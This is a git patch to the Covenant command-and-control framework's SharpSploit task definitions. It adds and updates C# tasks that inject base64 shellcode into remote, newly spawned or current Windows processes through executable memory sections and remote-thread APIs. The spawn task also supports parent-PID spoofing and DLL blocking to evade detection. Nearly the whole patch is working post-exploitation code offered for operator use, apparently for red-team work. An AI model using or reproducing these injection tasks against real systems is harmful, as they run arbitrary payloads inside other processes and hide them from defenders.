if (ParentPID == \"\" || ParentPID == \"\\\"\")\n {\n ProcID = (int)Shell.createProcessAsPInvoke(ProcessName, Domain, Username, Password).dwProcessId;\n }\n else\n {\n output += \"not implmented\";\n return output;\n //TODO\n // ADD FUNCTION IN SHARPSPLOIT\n //int PPID = Int32.Parse(ParentPID);\n //ProcID = (int)Shell.CreateProcessPInvokePPID(ProcessName,PPID).dwProcessId;\n }\n Process proc = Process.GetProcessById(ProcID);\n RemoteThreadCreate injectionTechnique = new RemoteThreadCreate\n {\n api = apiTechnique,\n suspended = false\n };\n SectionMapAlloc allocationTechnique = new SectionMapAlloc\n {\n localSectionPermissions = Win32.WinNT.PAGE_READWRITE,\n remoteSectionPermissions = Win32.WinNT.PAGE_EXECUTE_READWRITE,\n sectionAttributes = Win32.WinNT.SEC_COMMIT\n };\n\n PICPayload payload = new PICPayload(Convert.FromBase64String(ShellCode));\n IntPtr payloadLocation = allocationTechnique.Allocate(payload, proc);\n Injector.Inject(payload, allocationTechnique, injectionTechnique, proc);\n \n output += \"attempting to inject the provided shellcode into process \" + proc.ProcessName;\n return output;\n }\n catch (Exception e) { return e.GetType().FullName + \": \" + e.Message + Environment.NewLine + e.StackTrace; }\n return output;\n }\n}\n\n" - TaskingType: Assembly - UnsafeCompile: false - TokenTask: false - Options: - - Name: Technique - Value: '' - DefaultValue: CreateRemoteThread - Description: Injection technique - SuggestedValues: - - CreateRemoteThread - - NtCreateThreadEx - - RtlCreateUserThread - Optional: true - DisplayInCommand: true - FileOption: false - - Name: ProcessName - Value: '' - DefaultValue: '' - Description: Process ID of the process to impersonate - SuggestedValues: [] - Optional: false - DisplayInCommand: true - FileOption: false - - Name: ShellCode - Value: '' - DefaultValue: '' - Description: ShellCode to Inject. - SuggestedValues: [] - Optional: false - DisplayInCommand: false - FileOption: true - - Name: Username - Value: '' - DefaultValue: '' - Description: '' - SuggestedValues: [] - Optional: false - DisplayInCommand: true - FileOption: false - - Name: Password - Value: '' - DefaultValue: '' - Description: '' - SuggestedValues: [] - Optional: false - DisplayInCommand: true - FileOption: false - - Name: Domain - Value: '' - DefaultValue: '' - Description: '' - SuggestedValues: [] - Optional: false - DisplayInCommand: true - FileOption: false - - Name: ParentPID - Value: '' - DefaultValue: '' - Description: '' - SuggestedValues: [] - Optional: true - DisplayInCommand: true - FileOption: false - ReferenceSourceLibraries: - - Name: SharpSploit - Description: SharpSploit is a library for C# post-exploitation modules. - Location: SharpSploit\SharpSploit\ - Language: CSharp - CompatibleDotNetVersions: - - Net35 - - Net40 - ReferenceAssemblies: - - Name: System.Core.dll - Location: net40\System.Core.dll - DotNetVersion: Net40 - - Name: System.DirectoryServices.dll - Location: net40\System.DirectoryServices.dll - DotNetVersion: Net40 - - Name: System.DirectoryServices.Protocols.dll - Location: net40\System.DirectoryServices.Protocols.dll - DotNetVersion: Net40 - - Name: System.dll - Location: net40\System.dll - DotNetVersion: Net40 - - Name: System.IdentityModel.dll - Location: net40\System.IdentityModel.dll - DotNetVersion: Net40 - - Name: System.Management.Automation.dll - Location: net40\System.Management.Automation.dll - DotNetVersion: Net40 - - Name: System.Management.dll - Location: net40\System.Management.dll - DotNetVersion: Net40 - - Name: System.ServiceProcess.dll - Location: net40\System.ServiceProcess.dll - DotNetVersion: Net40 - - Name: mscorlib.dll - Location: net40\mscorlib.dll - DotNetVersion: Net40 - - Name: System.XML.dll - Location: net35\System.XML.dll - DotNetVersion: Net35 - - Name: System.Windows.Forms.dll - Location: net35\System.Windows.Forms.dll - DotNetVersion: Net35 - - Name: System.dll - Location: net35\System.dll - DotNetVersion: Net35 - - Name: System.DirectoryServices.Protocols.dll - Location: net35\System.DirectoryServices.Protocols.dll - DotNetVersion: Net35 - - Name: System.DirectoryServices.dll - Location: net35\System.DirectoryServices.dll - DotNetVersion: Net35 - - Name: System.Core.dll - Location: net35\System.Core.dll - DotNetVersion: Net35 - - Name: mscorlib.dll - Location: net35\mscorlib.dll - DotNetVersion: Net35 - - Name: System.IdentityModel.dll - Location: net35\System.IdentityModel.dll - DotNetVersion: Net35 - - Name: System.Management.Automation.dll - Location: net35\System.Management.Automation.dll - DotNetVersion: Net35 - - Name: System.Management.dll - Location: net35\System.Management.dll - DotNetVersion: Net35 - - Name: System.ServiceProcess.dll - Location: net35\System.ServiceProcess.dll - DotNetVersion: Net35 - - Name: System.Windows.Forms.dll - Location: net40\System.Windows.Forms.dll - DotNetVersion: Net40 - - Name: System.XML.dll - Location: net40\System.XML.dll - DotNetVersion: Net40 - EmbeddedResources: [] - ReferenceAssemblies: [] - EmbeddedResources: [] \ No newline at end of file From 918df28c6ccfde7ed9a0698b09ee9bd31c012cb4 Mon Sep 17 00:00:00 2001 From: salu90 Date: Wed, 30 Sep 2020 16:26:21 +0200 Subject: [PATCH 3/3] Update ProcessInjectionRemote, ProcessInjectionSpawn and add ProcessInjectionLocal --- .../Data/Tasks/SharpSploit.Execution.yaml | 180 ++++++++++++++++-- 1 file changed, 165 insertions(+), 15 deletions(-) diff --git a/Covenant/Data/Tasks/SharpSploit.Execution.yaml b/Covenant/Data/Tasks/SharpSploit.Execution.yaml index 2c5beaca..ff0083ad 100644 --- a/Covenant/Data/Tasks/SharpSploit.Execution.yaml +++ b/Covenant/Data/Tasks/SharpSploit.Execution.yaml @@ -1053,19 +1053,19 @@ EmbeddedResources: [] ReferenceAssemblies: [] EmbeddedResources: [] -- Name: ProcessInjection +- Name: ProcessInjectionRemote Aliases: [] Author: - Name: 'Simone Salucci & Daniel López' + Name: Simone Salucci & Daniel López Handle: '@saim1z @attl4s' Link: '' - Description: Injects and executes the specified shellcode into the process specified by the ProcessID parameter using one of the available techniques + Description: Injects and executes the specified Positional Independent Code into the process specified by the ProcessID parameter using one of the available techniques. Help: Language: CSharp CompatibleDotNetVersions: - Net35 - Net40 - Code: "using System;\nusing System.Diagnostics;\nusing SharpSploit.Execution;\nusing SharpSploit.Execution.Injection;\n\npublic static class Task\n{\n public static string Execute(string ExecutionTechnique, string ProcessID, string ShellCode)\n {\n string output = \"\";\n RemoteThreadCreate.APIS apiTechnique;\n\n if (ExecutionTechnique == \"CreateRemoteThread\") {apiTechnique = RemoteThreadCreate.APIS.CreateRemoteThread;}\n else if (ExecutionTechnique == \"NtCreateThreadEx\") {apiTechnique = RemoteThreadCreate.APIS.NtCreateThreadEx;}\n else if (ExecutionTechnique == \"RtlCreateUserThread\") {apiTechnique = RemoteThreadCreate.APIS.RtlCreateUserThread;}\n else if (ExecutionTechnique == \"\" || ExecutionTechnique == \"\\\"\")\n {\n apiTechnique = RemoteThreadCreate.APIS.CreateRemoteThread;\n output += \"No technique passed as argument. CreateRemoteThread technique was used\\n\";\n }\n else\n {\n output += \"Injection technique \" + ExecutionTechnique + \" is not implemented. Choose one of the following values:\\n\" +\n \"CreateRemoteThread\\n\" +\n \"NtCreateThreadEx\\n\" +\n \"RtlCreateUserThread\\n\";\n return output;\n }\n \n try\n { \n int ProcID;\n int currentProcessID = Process.GetCurrentProcess().Id;\n if (ProcessID == \"\" || ProcessID == \"\\\"\")\n {\n ProcID = currentProcessID;\n output += \"PID not specified, shellcode will be injected into the current process\\n\";\n }\n else\n {\n ProcID = Int32.Parse(ProcessID);\n }\n \n Process proc = Process.GetProcessById(ProcID);\n RemoteThreadCreate injectionTechnique = new RemoteThreadCreate\n {\n api = apiTechnique,\n suspended = false\n };\n SectionMapAlloc allocationTechnique = new SectionMapAlloc\n {\n localSectionPermissions = Win32.WinNT.PAGE_READWRITE,\n remoteSectionPermissions = Win32.WinNT.PAGE_EXECUTE_READWRITE,\n sectionAttributes = Win32.WinNT.SEC_COMMIT\n };\n\n PICPayload payload = new PICPayload(Convert.FromBase64String(ShellCode));\n IntPtr payloadLocation = allocationTechnique.Allocate(payload, proc);\n Injector.Inject(payload, allocationTechnique, injectionTechnique, proc);\n \n output += \"Attempting to inject the provided shellcode into process \" + proc.ProcessName + \" with PID \" + ProcID;\n return output;\n }\n catch (Exception e) { return e.GetType().FullName + \": \" + e.Message + Environment.NewLine + e.StackTrace; }\n return output;\n }\n}" + Code: "using System;\nusing System.Diagnostics;\nusing SharpSploit.Execution;\nusing SharpSploit.Execution.Injection;\n\npublic static class Task\n{\n public static string Execute(string ExecutionTechnique, string ProcessID, string PICpayload)\n {\n string output = \"\";\n RemoteThreadCreate.APIS apiTechnique;\n\n if (ExecutionTechnique == \"CreateRemoteThread\") {apiTechnique = RemoteThreadCreate.APIS.CreateRemoteThread;}\n else if (ExecutionTechnique == \"NtCreateThreadEx\") {apiTechnique = RemoteThreadCreate.APIS.NtCreateThreadEx;}\n else if (ExecutionTechnique == \"RtlCreateUserThread\") {apiTechnique = RemoteThreadCreate.APIS.RtlCreateUserThread;}\n else if (ExecutionTechnique == \"\" || ExecutionTechnique == \"\\\"\")\n {\n apiTechnique = RemoteThreadCreate.APIS.CreateRemoteThread;\n output += \"No technique passed as argument. CreateRemoteThread technique was used\\n\";\n }\n else\n {\n output += \"Injection technique \" + ExecutionTechnique + \" is not implemented. Choose one of the following values:\\n\" +\n \"CreateRemoteThread\\n\" +\n \"NtCreateThreadEx\\n\" +\n \"RtlCreateUserThread\\n\";\n return output;\n }\n \n try\n { \n if (ProcessID == \"\" || ProcessID == \"\\\"\")\n {\n output += \"No ProcessID passed as argument. Please specify a valid ProcessID\";\n }\n \n int ProcID = Int32.Parse(ProcessID); \n Process proc = Process.GetProcessById(ProcID);\n \n RemoteThreadCreate injectionTechnique = new RemoteThreadCreate\n {\n api = apiTechnique,\n suspended = false\n };\n \n SectionMapAlloc allocationTechnique = new SectionMapAlloc\n {\n localSectionPermissions = Win32.WinNT.PAGE_READWRITE,\n remoteSectionPermissions = Win32.WinNT.PAGE_EXECUTE_READWRITE,\n sectionAttributes = Win32.WinNT.SEC_COMMIT\n };\n\n PICPayload payload = new PICPayload(Convert.FromBase64String(PICpayload));\n Injector.Inject(payload, allocationTechnique, injectionTechnique, proc);\n \n output += \"Attempting to inject the provided shellcode into process \" + proc.ProcessName + \" with PID \" + ProcID;\n return output;\n }\n catch (Exception e) { return e.GetType().FullName + \": \" + e.Message + Environment.NewLine + e.StackTrace; }\n return output;\n }\n}" TaskingType: Assembly UnsafeCompile: false TokenTask: false @@ -1073,7 +1073,7 @@ - Name: ExecutionTechnique Value: '' DefaultValue: CreateRemoteThread - Description: The technique used to execute the specified shellcode. + Description: The technique used to execute the specified Positional Independent Code. SuggestedValues: - CreateRemoteThread - NtCreateThreadEx @@ -1084,15 +1084,15 @@ - Name: ProcessID Value: '' DefaultValue: '' - Description: Process ID of the process to impersonate. If empty, the shellcode will be injected into the current process. + Description: Process ID of the process to impersonate. SuggestedValues: [] - Optional: true + Optional: false DisplayInCommand: true FileOption: false - - Name: ShellCode + - Name: PICpayload Value: '' DefaultValue: '' - Description: ShellCode to Inject. + Description: Positional Independent Code to inject into the target process. SuggestedValues: [] Optional: false DisplayInCommand: false @@ -1178,16 +1178,16 @@ - Name: ProcessInjectionSpawn Aliases: [] Author: - Name: 'Simone Salucci & Daniel López' + Name: Simone Salucci & Daniel López Handle: '@saim1z @attl4s' Link: '' - Description: Creates a new process using the createProcess Win32 API call through PInvoke and injects and executes the specified shellcode using one of the available techniques + Description: Creates a new process using the createProcess Win32 API call through PInvoke and injects and executes the specified Positional Independent Code using one of the available techniques. Supports Parent Process Spoofing (PPID) and the BlockDLL attribute. Help: Language: CSharp CompatibleDotNetVersions: - Net35 - Net40 - Code: "using System;\nusing System.Diagnostics;\n\nusing SharpSploit.Execution;\nusing SharpSploit.Execution.Injection;\n\npublic static class Task\n{\n public static string Execute(string ExecutionTechnique, string ProcessName, string ShellCode,string ParentPID)\n {\n string output = \"\";\n RemoteThreadCreate.APIS apiTechnique;\n\n if (ExecutionTechnique == \"CreateRemoteThread\") {apiTechnique = RemoteThreadCreate.APIS.CreateRemoteThread;}\n else if (ExecutionTechnique == \"NtCreateThreadEx\") {apiTechnique = RemoteThreadCreate.APIS.NtCreateThreadEx;}\n else if (ExecutionTechnique == \"RtlCreateUserThread\") {apiTechnique = RemoteThreadCreate.APIS.RtlCreateUserThread;} \n else if (ExecutionTechnique == \"\" || ExecutionTechnique == \"\\\"\")\n {\n apiTechnique = RemoteThreadCreate.APIS.CreateRemoteThread;\n output += \"No technique passed as argument. CreateRemoteThread technique was used\\n\";\n }\n else\n {\n output += \"Injection technique \" + ExecutionTechnique + \" is not implemented. Choose one of the following values:\\n\" +\n \"CreateRemoteThread\\n\" +\n \"NtCreateThreadEx\\n\" +\n \"RtlCreateUserThread\\n\";\n return output;\n }\n \n try\n { \n int ProcID;\n if (ParentPID == \"\" || ParentPID == \"\\\"\")\n {\n ProcID = (int)Shell.CreateProcessPInvoke(ProcessName).dwProcessId;\n }\n else\n {\n int PPID = Int32.Parse(ParentPID);\n ProcID = (int)Shell.CreateProcessPInvokePPID(ProcessName,PPID).dwProcessId;\n }\n \n Process proc = Process.GetProcessById(ProcID);\n RemoteThreadCreate injectionTechnique = new RemoteThreadCreate\n {\n api = apiTechnique,\n suspended = false\n };\n SectionMapAlloc allocationTechnique = new SectionMapAlloc\n {\n localSectionPermissions = Win32.WinNT.PAGE_READWRITE,\n remoteSectionPermissions = Win32.WinNT.PAGE_EXECUTE_READWRITE,\n sectionAttributes = Win32.WinNT.SEC_COMMIT\n };\n\n PICPayload payload = new PICPayload(Convert.FromBase64String(ShellCode));\n IntPtr payloadLocation = allocationTechnique.Allocate(payload, proc);\n Injector.Inject(payload, allocationTechnique, injectionTechnique, proc);\n \n output += \"Attempting to inject the provided shellcode into process \" + proc.ProcessName;\n return output;\n }\n catch (Exception e) { return e.GetType().FullName + \": \" + e.Message + Environment.NewLine + e.StackTrace; }\n return output;\n }\n}\n\n" + Code: "using System;\nusing System.Diagnostics;\nusing SharpSploit.Execution;\nusing SharpSploit.Execution.Injection;\n\npublic static class Task\n{\n public static string Execute(string ExecutionTechnique, string Binary, string PICpayload, string ParentPID, string BlockDLL)\n {\n string output = \"\";\n RemoteThreadCreate.APIS apiTechnique;\n \n if (ExecutionTechnique == \"CreateRemoteThread\") {apiTechnique = RemoteThreadCreate.APIS.CreateRemoteThread;}\n else if (ExecutionTechnique == \"NtCreateThreadEx\") {apiTechnique = RemoteThreadCreate.APIS.NtCreateThreadEx;}\n else if (ExecutionTechnique == \"RtlCreateUserThread\") {apiTechnique = RemoteThreadCreate.APIS.RtlCreateUserThread;} \n else if (ExecutionTechnique == \"\" || ExecutionTechnique == \"\\\"\")\n {\n apiTechnique = RemoteThreadCreate.APIS.CreateRemoteThread;\n output += \"No technique passed as argument. CreateRemoteThread technique was used\\n\";\n }\n else\n {\n output += \"Injection technique \" + ExecutionTechnique + \" is not implemented. Choose one of the following values:\\n\" +\n \"CreateRemoteThread\\n\" +\n \"NtCreateThreadEx\\n\" +\n \"RtlCreateUserThread\\n\";\n return output;\n }\n \n try\n { \n bool BlockDLLb = (BlockDLL.ToLower() == \"true\" ? true : false);\n \n int ProcID;\n if (ParentPID == \"\" || ParentPID == \"\\\"\")\n {\n ProcID = (int)Shell.CreateProcessPInvoke(Binary,BlockDLLb).dwProcessId;\n }\n else\n {\n int PPID = Int32.Parse(ParentPID);\n ProcID = (int)Shell.CreateProcessPInvokePPID(Binary,PPID,BlockDLLb).dwProcessId;\n }\n \n Process proc = Process.GetProcessById(ProcID);\n RemoteThreadCreate injectionTechnique = new RemoteThreadCreate\n {\n api = apiTechnique,\n suspended = false\n };\n SectionMapAlloc allocationTechnique = new SectionMapAlloc\n {\n localSectionPermissions = Win32.WinNT.PAGE_READWRITE,\n remoteSectionPermissions = Win32.WinNT.PAGE_EXECUTE_READWRITE,\n sectionAttributes = Win32.WinNT.SEC_COMMIT\n };\n\n PICPayload payload = new PICPayload(Convert.FromBase64String(PICpayload));\n Injector.Inject(payload, allocationTechnique, injectionTechnique, proc);\n \n output += \"Attempting to inject the provided shellcode into process \" + proc.ProcessName;\n return output;\n }\n catch (Exception e) { return e.GetType().FullName + \": \" + e.Message + Environment.NewLine + e.StackTrace; }\n return output;\n }\n}\n\n" TaskingType: Assembly UnsafeCompile: false TokenTask: false @@ -1203,7 +1203,7 @@ Optional: true DisplayInCommand: true FileOption: false - - Name: ProcessName + - Name: Binary Value: '' DefaultValue: '' Description: Full path of the new process to spawn (e.g. C:\windows\system32\notepad.exe). @@ -1211,10 +1211,10 @@ Optional: false DisplayInCommand: true FileOption: false - - Name: ShellCode + - Name: PICpayload Value: '' DefaultValue: '' - Description: ShellCode to Inject. + Description: Positional Independent Code to inject in the target process. SuggestedValues: [] Optional: false DisplayInCommand: false @@ -1227,6 +1227,156 @@ Optional: true DisplayInCommand: true FileOption: false + - Name: BlockDLL + Value: '' + DefaultValue: False + Description: Boolean, whether to use BlockDDL. + SuggestedValues: [] + Optional: true + DisplayInCommand: true + FileOption: false + ReferenceSourceLibraries: + - Name: SharpSploit + Description: SharpSploit is a library for C# post-exploitation modules. + Location: SharpSploit\SharpSploit\ + Language: CSharp + CompatibleDotNetVersions: + - Net35 + - Net40 + ReferenceAssemblies: + - Name: System.Core.dll + Location: net40\System.Core.dll + DotNetVersion: Net40 + - Name: System.DirectoryServices.dll + Location: net40\System.DirectoryServices.dll + DotNetVersion: Net40 + - Name: System.DirectoryServices.Protocols.dll + Location: net40\System.DirectoryServices.Protocols.dll + DotNetVersion: Net40 + - Name: System.dll + Location: net40\System.dll + DotNetVersion: Net40 + - Name: System.IdentityModel.dll + Location: net40\System.IdentityModel.dll + DotNetVersion: Net40 + - Name: System.Management.Automation.dll + Location: net40\System.Management.Automation.dll + DotNetVersion: Net40 + - Name: System.Management.dll + Location: net40\System.Management.dll + DotNetVersion: Net40 + - Name: System.ServiceProcess.dll + Location: net40\System.ServiceProcess.dll + DotNetVersion: Net40 + - Name: mscorlib.dll + Location: net40\mscorlib.dll + DotNetVersion: Net40 + - Name: System.XML.dll + Location: net35\System.XML.dll + DotNetVersion: Net35 + - Name: System.Windows.Forms.dll + Location: net35\System.Windows.Forms.dll + DotNetVersion: Net35 + - Name: System.dll + Location: net35\System.dll + DotNetVersion: Net35 + - Name: System.DirectoryServices.Protocols.dll + Location: net35\System.DirectoryServices.Protocols.dll + DotNetVersion: Net35 + - Name: System.DirectoryServices.dll + Location: net35\System.DirectoryServices.dll + DotNetVersion: Net35 + - Name: System.Core.dll + Location: net35\System.Core.dll + DotNetVersion: Net35 + - Name: mscorlib.dll + Location: net35\mscorlib.dll + DotNetVersion: Net35 + - Name: System.IdentityModel.dll + Location: net35\System.IdentityModel.dll + DotNetVersion: Net35 + - Name: System.Management.Automation.dll + Location: net35\System.Management.Automation.dll + DotNetVersion: Net35 + - Name: System.Management.dll + Location: net35\System.Management.dll + DotNetVersion: Net35 + - Name: System.ServiceProcess.dll + Location: net35\System.ServiceProcess.dll + DotNetVersion: Net35 + - Name: System.Windows.Forms.dll + Location: net40\System.Windows.Forms.dll + DotNetVersion: Net40 + - Name: System.XML.dll + Location: net40\System.XML.dll + DotNetVersion: Net40 + EmbeddedResources: [] + ReferenceAssemblies: [] + EmbeddedResources: [] +- Name: ProcessInjectionLocal + Aliases: [] + Author: + Name: Simone Salucci & Daniel López + Handle: '@saim1z @attl4s' + Link: '' + Description: Injects and executes the specified Positional Independent Code into the current process. + Help: + Language: CSharp + CompatibleDotNetVersions: + - Net35 + - Net40 + Code: >- + using System; + + using System.Diagnostics; + + using System.Runtime.InteropServices; + + using SharpSploit.Execution; + + using SharpSploit.Execution.Injection; + + + public static class Task + + { + [UnmanagedFunctionPointerAttribute(CallingConvention.Cdecl)] + private delegate Int32 Run(); + + public static string Execute(string PICpayload) + { + try + { + Process proc = Process.GetCurrentProcess(); + SectionMapAlloc allocationTechnique = new SectionMapAlloc + { + localSectionPermissions = Win32.WinNT.PAGE_READWRITE, + remoteSectionPermissions = Win32.WinNT.PAGE_EXECUTE_READWRITE, + sectionAttributes = Win32.WinNT.SEC_COMMIT + }; + + PICPayload payload = new PICPayload(Convert.FromBase64String(PICpayload)); + IntPtr baseAddr = allocationTechnique.Allocate(payload, proc); + Run del = (Run)Marshal.GetDelegateForFunctionPointer(baseAddr, typeof(Run)); + del(); + return "ShellCode execution succeeded."; + } + catch (Exception e) { return e.GetType().FullName + ": " + e.Message + Environment.NewLine + e.StackTrace; } + return "ShellCode execution failed."; + } + } + TaskingType: Assembly + UnsafeCompile: false + TokenTask: false + Options: + - Name: PICpayload + Value: '' + DefaultValue: '' + Description: Positional Independent Code to inject into the current process. + SuggestedValues: [] + Optional: false + DisplayInCommand: false + FileOption: true ReferenceSourceLibraries: - Name: SharpSploit Description: SharpSploit is a library for C# post-exploitation modules.